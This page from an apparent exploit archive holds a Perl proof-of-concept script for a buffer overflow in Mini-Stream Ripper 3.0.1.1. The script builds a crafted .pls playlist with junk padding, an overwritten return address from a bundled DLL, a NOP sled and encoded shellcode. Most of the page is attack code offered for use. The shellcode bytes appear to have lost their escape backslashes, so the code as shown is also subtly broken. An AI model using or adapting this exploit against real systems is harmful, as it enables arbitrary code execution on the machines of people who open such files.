Home / os / winme

ministreamripper3011-overflow.txt

Posted on 30 December 2009

#Mini-Stream Ripper v3.0.1.1 Universal BOF !!! #Discovered by ( mr_me) !!! #Coded and Written by (Jacky) #Greetz to Peter Van Eeckhoutte and all Corelanc0d3r team :D #This time i exploited the program and i used as RET address a Universal one from MSRcodec00.dll #And i haven't seen anyone using a universal address so i decided to do so ! ;-) my $file="crash.pls"; print "Mini-Stream Ripper 3.0.1.1 Universal BOF vulnerability "; print "Greetz to Peter Van Eeckhoutte and Corelanc0d3r Team "; my $junk="A"x26074; my $eip=pack('V',0x0146b87b); #>>>From MSRcodec001.dll (Universal address ;-) ) my $presc="SEXY"; # 4 Bytes to fill the pre-esp area ! my $esp="x90"x25; $esp=$esp."xebx03x59xebx05xe8xf8xffxffxffx4fx49x49x49x49x49". "x49x51x5ax56x54x58x36x33x30x56x58x34x41x30x42x36". "x48x48x30x42x33x30x42x43x56x58x32x42x44x42x48x34". "x41x32x41x44x30x41x44x54x42x44x51x42x30x41x44x41". "x56x58x34x5ax38x42x44x4ax4fx4dx4ex4fx4ax4ex46x54". "x42x50x42x50x42x30x4bx38x45x44x4ex43x4bx58x4ex57". "x45x50x4ax37x41x50x4fx4ex4bx38x4fx44x4ax31x4bx38". "x4fx55x42x32x41x30x4bx4ex49x34x4bx58x46x43x4bx58". "x41x50x50x4ex41x53x42x4cx49x49x4ex4ax46x38x42x4c". "x46x47x47x30x41x4cx4cx4cx4dx50x41x30x44x4cx4bx4e". "x46x4fx4bx43x46x55x46x52x46x50x45x47x45x4ex4bx58". "x4fx35x46x42x41x50x4bx4ex48x36x4bx58x4ex30x4bx34". "x4bx48x4fx35x4ex51x41x30x4bx4ex4bx38x4ex31x4bx48". "x41x30x4bx4ex49x38x4ex35x46x32x46x50x43x4cx41x33". "x42x4cx46x36x4bx48x42x54x42x33x45x38x42x4cx4ax57". "x4ex50x4bx48x42x54x4ex30x4bx38x42x57x4ex41x4dx4a". "x4bx48x4ax46x4ax30x4bx4ex49x50x4bx58x42x48x42x4b". "x42x50x42x30x42x30x4bx38x4ax36x4ex53x4fx35x41x43". "x48x4fx42x46x48x55x49x48x4ax4fx43x58x42x4cx4bx57". "x42x35x4ax36x42x4fx4cx58x46x50x4fx55x4ax46x4ax49". "x50x4fx4cx58x50x50x47x35x4fx4fx47x4ex43x46x41x46". "x4ex46x43x36x42x30x5a"; open(HOLA,">$file"); print HOLA $junk.$eip.$presc.$esp; print "[+] Done!!! "; print "Written By Jacky "; close(HOLA);

 

TOP